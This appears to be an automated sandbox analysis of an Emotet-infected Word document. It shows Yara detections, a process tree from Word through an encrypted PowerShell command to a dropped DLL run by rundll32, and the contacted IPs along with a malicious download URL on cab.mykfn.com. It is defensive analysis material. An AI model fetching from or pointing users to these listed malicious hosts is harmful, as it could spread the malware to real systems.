Queries the volume information (name, serial number, etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Behavior Graph ID: 344615 Sample: PO# 01222021.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100

Top signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 15 other signatures

Process tree:
  • WINWORD.EXE
  • cmd.exe (Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found)
    • msg.exe
    • powershell.exe (contacts cab.mykfn.com 103.143.46.51 port 80, NETMAGIC-APNetmagicDatacenterMumbaiIN India; Powershell drops PE file: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll, PE32)
      • rundll32.exe
        • rundll32.exe
          • rundll32.exe (Hides that the sample has been downloaded from the Internet (zone.identifier))
            • rundll32.exe
              • rundll32.exe (Hides that the sample has been downloaded from the Internet (zone.identifier))
                • rundll32.exe
                  • rundll32.exe (Hides that the sample has been downloaded from the Internet (zone.identifier))
                    • rundll32.exe

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
195.159.28.230 | unknown | Norway | 2116 | ASN-CATCHCOMNO | true
69.38.130.14 | unknown | United States | 26878 | TWRS-NYCUS | true
103.143.46.51 | unknown | India | 17439 | NETMAGIC-APNetmagicDatacenterMumbaiIN | true

Contacted Domains

Name | IP | Active
cab.mykfn.com | 103.143.46.51 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://cab.mykfn.com/admin/X/ | true | 15% (Virustotal); Avira URL Cloud: malware | unknown